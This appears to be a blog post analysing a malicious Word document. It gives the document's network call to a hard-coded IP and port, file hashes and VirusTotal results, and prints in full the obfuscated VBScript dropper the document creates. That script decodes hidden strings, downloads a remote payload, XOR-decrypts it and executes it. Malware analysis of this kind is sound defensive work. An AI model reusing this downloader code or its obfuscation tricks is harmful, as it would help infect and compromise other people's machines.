So with the push of the Christmas season upon me and my family, it has taken some time to get back to this. So with that being said, I have come back to it only to find out that the malicious word doc is not working fully at the present time – most likely since the compromised server is no longer up/has been fixed. But here is the little bit that I got from running the word doc.
After running the malicious word doc within my test VM, I could see a call being made to an IP address of 176.107.176.60 on port 10025. Since it has been a while since this email was received, the compromised server has most likely been taken offline or fixed since there is no response as we can see in the PCAP:
GET /1.jpg HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: 176.107.176.60:10025 Proxy-Connection: Keep-Alive
VirusTotal does show a record for this particular IP address as seen below:
VirusTotal: http://www.virustotal.com/en/url/63e556c39ffdf106335aed96e9cc8c26ee29cf8f47a5ecbd64727b53fbe6ced7/analysis/
Detection ratio: 3 / 66
First Submission: 2015-12-15 13:04:13 UTC
It also looks like it creates a new VBS file as well within the “C:\Users\Administrator\AppData\Roaming” folder called “14997.vbs.” VirusTotal did not have this listed in it’s database unfortunately. Here are those results from when I uploaded the file to VT:
MD5: 3b4914287915f961ccc6e3b6eb2631c8
SHA256: d7effb527b7a2dcac770674b66aafd96c35dc52a14542de0bb968c28a259bf40
File size: 3.4KB
VirusTotal: http://www.virustotal.com/en/file/d7effb527b7a2dcac770674b66aafd96c35dc52a14542de0bb968c28a259bf40/analysis/1450624617/
First Submission: 2015-12-20 15:16:57 UTC
Detection ratio: 5 / 55
Here is the script as well:
Dim UmjIXO2hir, KiaB14or7AP4MJs3N sub RvzNM87uD2Uk() Dim Q8eF5tz, J1osO1Xdjhm For Q8eF5tz = 21 To 2000369 J1osO1Xdjhm = AQ1rj2btk + 51 + 84 + 86 Next End Sub Function PW6zO9Wi2(ImpHrHkWLHm,JG8Z4Kmn2,JFc2vrhu0ju) Dim L0A9lV2qvBLzt7I, XZSFk9ykDjRgHCE, DJrH, YxusiNzWR8z, LX9kL, SaZkf() Set XZSFk9ykDjRgHCE = CreateObject(P7aXJwQhP("3A05420047331E5F264720590552140E42350C0B7F0B5D221445", "Aif0i7Gw1")) Set DJrH = XZSFk9ykDjRgHCE.GEtFILE(ImpHrHkWLHm) Set LX9kL = DJrH.oPeNastExtStreaM(1, 0) Set YxusiNzWR8z = XZSFk9ykDjRgHCE.CreAtETEXtfiLe(JG8Z4Kmn2, 1, 0) L0A9lV2qvBLzt7I = 0 ReDim SaZkf(Len(JFc2vrhu0ju) - 1) For L0A9lV2qvBLzt7I = 0 To UBound(SaZkf) SaZkf(L0A9lV2qvBLzt7I) = Asc(Mid(JFc2vrhu0ju, L0A9lV2qvBLzt7I + 1, 1)) Next Do Until LX9kL.aTeNDOFStREAM L0A9lV2qvBLzt7I = (L0A9lV2qvBLzt7I + 1) \ (UBound(SaZkf) + 1) YxusiNzWR8z.WrIte chr(Asc(LX9kL.REAd(1)) Xor SaZkf(L0A9lV2qvBLzt7I)) Loop YxusiNzWR8z.Close LX9kL.Close Set LX9kL = Nothing Set DJrH = Nothing Set YxusiNzWR8z = Nothing Set XZSFk9ykDjRgHCE = Nothing End Function Sub Olep7i7Kiur(MAyxtrNPneQ2NWZ7k) Dim ClPZ ClPZ = Timer + MAyxtrNPneQ2NWZ7k Do While Timer < ClPZ Loop End Sub Sub RcEJWSKV4kbbHw() Dim SMb0MjiAHbCa7ncac, NHgJOxl2hir Set SMb0MjiAHbCa7ncac = CreateObject(P7aXJwQhP("061524202D33186A1E0704353D", "YQFGRDClDMoa")) RvzNM87uD2Uk NGhXERANM = WscRIpT.sCriPtNAME NGhXERANM = Left(NGhXERANM, Len(NGhXERANM) - (2 + 7 + 2 - 7)) UmjIXO2hir = SMb0MjiAHbCa7ncac.EXpAndENViRonmENtstRINGS(P7aXJwQhP("5024222503500C1661", "GuERUg1xwD")) & "\" & NGhXERANM Set NHgJOxl2hir = CreateObject(P7aXJwQhP("22312A1D373A003E3D41000423101D3B08", "IoX")) NHgJOxl2hir.oPEn P7aXJwQhP("2E1363", "FiV704uNs05DkXL"), P7aXJwQhP("3D3B3B03737A607E447F7B7E7F44676478795D7F65757E4379677A6042673F3F28", "IUOOs"), 0 NHgJOxl2hir.SEnD() if NHgJOxl2hir.reADYSTAtE = (2 + 5 + 2 - 5) and NHgJOxl2hir.statuS = (100 + 1 + 100 - 1) then RvzNM87uD2Uk A9EyFbvfiiPnu NHgJOxl2hir.ReSPONSEBoDy end if End Sub Pxhu5jG3sVJvW Function P7aXJwQhP(GicLFzK4z, WuDVCowp4c) Dim KED4i4J41QJIrnYE, XCUpD, QbspWznb91 For KED4i4J41QJIrnYE = 1 To (Len(GicLFzK4z) / 2) XCUpD = (Chr(38) & Chr(72) & (Mid(GicLFzK4z, (KED4i4J41QJIrnYE + KED4i4J41QJIrnYE) - 1, 2))) QbspWznb91 = (Asc(Mid(WuDVCowp4c, ((KED4i4J41QJIrnYE Mod Len(WuDVCowp4c)) + 1), 1))) P7aXJwQhP = P7aXJwQhP + chr(XCUpD Xor QbspWznb91) Next End Function sub Pxhu5jG3sVJvW() Dim DOPo6yeQIQ0KMjs, PsGNJpm5ejbM, TlscH7mFdrkHWvBFz DOPo6yeQIQ0KMjs = 91255263: PsGNJpm5ejbM = 0: TlscH7mFdrkHWvBFz = 0 For PsGNJpm5ejbM = 1 To DOPo6yeQIQ0KMjs TlscH7mFdrkHWvBFz = TlscH7mFdrkHWvBFz + 1 Next If TlscH7mFdrkHWvBFz = DOPo6yeQIQ0KMjs Then Olep7i7Kiur (4) RcEJWSKV4kbbHw XAwnfxrYiA4 Else MsgBox "87", 16, "17" End If End Sub Sub A9EyFbvfiiPnu(YHT33KI3x4xVelz7) Dim Su8OPyfzt4Ku45ua Set Su8OPyfzt4Ku45ua = CreateObject(P7aXJwQhP("120738740C6F6102370C2621", "TSCw0NA2vEiGLd")) Su8OPyfzt4Ku45ua.opEn Su8OPyfzt4Ku45ua.tYpE = 1 Su8OPyfzt4Ku45ua.WRITe YHT33KI3x4xVelz7 Su8OPyfzt4Ku45ua.SAVEToFilE UmjIXO2hir, (1 + 5 + 1 - 5) Su8OPyfzt4Ku45ua.Close Olep7i7Kiur (2) KiaB14or7AP4MJs3N = UmjIXO2hir UmjIXO2hir = UmjIXO2hir & second(time) & P7aXJwQhP("57521501", "Qy7md1eKE5CxqP") PW6zO9Wi2 KiaB14or7AP4MJs3N, UmjIXO2hir, P7aXJwQhP("355100765445", "UT3cGfvjM4") End Sub Sub XAwnfxrYiA4() CreateObject(P7aXJwQhP("60240C2A0769723C192A02245238002905", "G3LiFk")).sHELLexECUte UmjIXO2hir, "", "", P7aXJwQhP("1A43520F", "Nu37aPdZsl"), 1 End sub
I have also gotten a video of the VM when I started running the malicious Word document which you can watch here. The interesting thing about the Word doc is that the script that it creates in the Appdata/Roaming folder has different names when you run it. I noticed this when messing around with VirtualBox and trying to get the video recording setup correctly. The name of the file always changed, but the error that it gave, and the IP/port combination that it tried to contact always stayed the same.